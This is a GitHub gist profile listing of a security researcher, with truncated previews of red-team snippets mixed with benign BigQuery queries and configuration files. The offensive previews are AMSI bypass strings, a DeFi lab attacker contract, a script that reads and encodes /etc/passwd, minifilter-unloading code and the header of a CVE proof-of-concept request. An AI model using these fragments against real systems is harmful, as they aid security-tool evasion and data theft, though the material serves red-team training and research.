Skip to content

Instantly share code, notes, and snippets.

Avatar

Steve Borosh rvrsh3ll

View GitHub Profile
View Invoke-RestMethod with cookie and header.ps1
@rvrsh3ll
rvrsh3ll / SANSReflection.txt
Created Oct 23, 2021 — forked from jfmaes/SANSReflection.txt
Register for the SEC699 ;-)
View SANSReflection.txt
Hi SANS Workshop Attendees! Reflection is super fun!
amsi.dll
AmsiScanBuffer
uFcAB4DD
View AttackContract.sol
pragma solidity ^0.6.0;
import "./TrusterLenderPool.sol";
contract AttackerContract{
uint256 public totalTokens = 1000000 ether;
address public attackerAddress;
// DamnValuableToken public dvTokenContract;
address public dvTokenContract;
TrusterLenderPool public poolContract;
@rvrsh3ll
rvrsh3ll / read-file-gzip-base64.ps1
Created Aug 6, 2021 — forked from FrankSpierings/read-file-gzip-base64.ps1
Read file, gzip and convert to base64.
View read-file-gzip-base64.ps1
$filepath = "/etc/passwd"
$fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open)
$ms = New-Object System.IO.MemoryStream;
$gzs = New-Object System.IO.Compression.GzipStream($ms, [System.IO.Compression.CompressionMode]::Compress);
$fs.CopyTo($gzs);
$fs.Close();
$gzs.Close();
$ms.Close();
[System.Convert]::ToBase64String($ms.ToArray());
@rvrsh3ll
rvrsh3ll / Web.config
Created May 30, 2021
Azure Web App Example Web.config
View Web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<staticContent>
<mimeMap fileExtension=".iso" mimeType="application/octet-stream" />
<mimeMap fileExtension=".exe" mimeType="application/octet-stream" />
<mimeMap fileExtension=".zip" mimeType="application/x-zip-compressed" />
</staticContent>
</system.webServer>
</configuration>
@rvrsh3ll
rvrsh3ll / Unload_Minifilter.c
Created May 29, 2021 — forked from OsandaMalith/Unload_Minifilter.c
Unloading a minifilter driver by calling the FilterUnload which is the Win32 equivalent of FltUnloadFilter. It will call the minifilter's FilterUnloadCallback (PFLT_FILTER_UNLOAD_CALLBACK) routine.
View Unload_Minifilter.c
#include "stdafx.h"
#include <Windows.h>
#include <fltuser.h>
#pragma comment(lib,"FltLib.lib")
/*
Author: Osanda Malith Jayathissa (@OsandaMalith)
Website: https://osandamalith.com
Description: Unloading a minifilter driver by calling the FilterUnload which is the Win32 equivalent of FltUnloadFilter.
View PoC_CVE-2021–31474.json
POST /api/Action/TestAction HTTP/1.1
Host: <target>
Content-Length: 3978
Accept: application/json, text/javascript, */*; q=0.01
X-XSRF-TOKEN: <token>
X-Requested-With: XMLHttpRequest
ViewLimitationID: 0
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Cookie: <cookie>
@rvrsh3ll
rvrsh3ll / BigQuery_ETH.txt
Created Feb 18, 2021
Google BigQuery Ethereum Addresses
View BigQuery_ETH.txt
#standardSQL
with double_entry_book as (
-- debits
select to_address as address, value as value
from `bigquery-public-data.crypto_ethereum.traces`
where to_address is not null
and status = 1
and (call_type not in ('delegatecall', 'callcode', 'staticcall') or call_type is null)
union all
-- credits
@rvrsh3ll
rvrsh3ll / BigQuery_BTC.txt
Last active Aug 17, 2021
Google BigQuery Bitcoin Addresses
View BigQuery_BTC.txt
WITH double_entry_book AS (
-- debits
SELECT
array_to_string(inputs.addresses, ",") as address
, -inputs.value as value
, block_timestamp
FROM `bigquery-public-data.crypto_bitcoin.inputs` as inputs
UNION ALL
@rvrsh3ll
rvrsh3ll / tmux.conf
Created Feb 18, 2021 — forked from swtornio/tmux.conf
tmux config
View tmux.conf
#############################################
## DEFAULT GENERAL SETTINGS (tmux show -g) ##
#############################################
set-option -g activity-action other
set-option -g assume-paste-time 1
set-option -g base-index 0
set-option -g bell-action any
set-option -g default-command ""
set-option -g default-shell "/bin/bash"